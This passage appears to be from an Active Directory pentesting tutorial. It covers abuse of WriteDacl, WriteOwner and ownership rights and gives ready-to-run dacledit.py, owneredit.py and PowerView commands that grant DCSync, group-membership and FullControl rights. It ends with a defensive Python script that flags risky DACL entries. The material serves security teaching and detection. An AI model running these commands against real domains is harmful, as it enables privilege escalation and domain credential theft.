Granting Rights and Ownership

Permissions such as WriteDacl and Ownership play a crucial role in controlling access to objects and keeping them secure. The WriteDacl access right lets an account modify the DACL of a target object. Ownership, on the other hand, denotes administrative control over an object: the owner implicitly holds the right to rewrite its DACL. Understanding these two rights matters because they determine how a DACL can be manipulated and which abuses that opens up.

If we possess an account with the right to modify a target object's DACL, we can use that account to edit the DACL and make the target vulnerable to other attacks.

WriteDacl

Once we find an account with WriteDacl or Ownership over another object, we can modify its DACL to, for example, grant ourselves DCSync rights (the replication extended rights on the domain object):

dacledit.py -principal otter -target-dn dc=domain,dc=com -dc-ip 10.10.10.10 domain.com/otter:'SomethingSecure123!' -action write -rights DCSync
Import-Module .\PowerView.ps1
Add-DomainObjectAcl -TargetIdentity $(Get-DomainSID) -PrincipalIdentity otter -Rights DCSync -Verbose

Another option is to grant ourselves the right to manage the membership of a group:

dacledit.py -principal otter -target "Vulnerable Group" -action write -rights WriteMembers -dc-ip 10.10.10.10 domain.com/otter:'SomethingSecure123!'

Now we can add ourselves or another user to a group like we did in the AddMembers section.

WriteOwner

This right allows us to change the owner of the target object, i.e. the OwnerSid field of the object's security descriptor. The BloodHound query below lists users that hold it:

MATCH p=((n:User)-[r:WriteOwner]->(m)) RETURN p

With this kind of right we can perform a GPO attack. Specifically, we abuse WriteOwner with owneredit.py to make our principal the owner of the target:

owneredit.py -action write -new-owner otter -target targetUser -dc-ip 10.10.10.10 domain.com/otter:'SomethingSecure123!'

Usually this step is followed by editing the target's DACL to grant ourselves something like FullControl, which works because the owner implicitly holds WriteDacl:

dacledit.py -principal otter -target targetUser -action write -rights FullControl -dc-ip 10.10.10.10 domain.com/otter:'SomethingSecure123!'

From Windows the same can be done with PowerView:

Set-DomainObjectOwner -Identity targetUser -OwnerIdentity otter -Verbose
Add-DomainObjectAcl -TargetIdentity targetUser -PrincipalIdentity otter -Rights All -Verbose
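Every grant above ends up as an ACE in the target's DACL, so the defender's check is to read the security descriptor back and look for exactly those ACEs. The script below is an added example (not code from this page, impacket or PowerView): it parses an SDDL DACL string, such as the one returned by Get-DomainObjectAcl -Sddl or ldapsearch for nTSecurityDescriptor, and flags ACEs granting WriteDacl, WriteOwner, GenericAll or the two replication rights DCSync needs to principals outside a trusted set. The sample SDDL and the SIDs in it are constructed.

```python
import re

# Extended-right GUIDs that DCSync requires (AD schema control-access rights).
REPL_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
}
# Access-mask bits behind the SDDL rights tokens this check cares about.
TOKEN_BITS = {"CR": 0x100, "WD": 0x40000, "WO": 0x80000, "GA": 0x10000000}
ACE_RE = re.compile(r"\(([^)]*)\)")


def rights_mask(rights):
    """SDDL rights are either a hex access mask or concatenated two-letter tokens."""
    if rights.lower().startswith("0x"):
        return int(rights, 16)
    mask = 0
    for i in range(0, len(rights), 2):
        mask |= TOKEN_BITS.get(rights[i:i + 2], 0)
    return mask


def parse_dacl(sddl):
    """Yield (ace_type, mask, object_guid, sid) for each ACE in the D: part."""
    dacl = sddl.split("D:", 1)[1].split("S:", 1)[0]
    for m in ACE_RE.finditer(dacl):
        f = m.group(1).split(";")
        if len(f) >= 6:
            yield f[0], rights_mask(f[2]), f[3].lower(), f[5]


def risky_aces(sddl, trusted_sids):
    """(sid, reason) for allow-ACEs that hand dangerous rights to untrusted principals."""
    out = []
    for ace_type, mask, guid, sid in parse_dacl(sddl):
        if ace_type not in ("A", "OA") or sid in trusted_sids:
            continue
        if mask & 0x10000000:
            out.append((sid, "GenericAll"))
        if mask & 0x40000:
            out.append((sid, "WriteDacl"))
        if mask & 0x80000:
            out.append((sid, "WriteOwner"))
        if mask & 0x100 and (guid in REPL_GUIDS or guid == ""):
            out.append((sid, REPL_GUIDS.get(guid, "AllExtendedRights")))
    return out


def dcsync_capable(findings):
    """Principals holding both replication rights (or a right that implies them)."""
    held = {}
    for sid, reason in findings:
        held.setdefault(sid, set()).add(reason)
    return {s for s, r in held.items()
            if set(REPL_GUIDS.values()) <= r or r & {"AllExtendedRights", "GenericAll"}}


# Constructed sample: domain head after RID 1105 got both replication rights
# and RID 1106 got WriteDacl + WriteOwner. DA/SY/BA are SDDL well-known aliases.
SAMPLE_SDDL = ("O:DAG:DAD:(A;;GA;;;DA)"
               "(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-1-2-3-1105)"
               "(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-1-2-3-1105)"
               "(A;;WDWO;;;S-1-5-21-1-2-3-1106)(A;;RPLCLORC;;;AU)")
TRUSTED = {"DA", "SY", "BA", "S-1-5-9"}
```

Run it with `risky_aces(SAMPLE_SDDL, TRUSTED)` and feed the result to `dcsync_capable` to see which principal would pass a DCSync check; in production, point it at the domain head's SDDL and a sensible allowlist instead of the sample.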
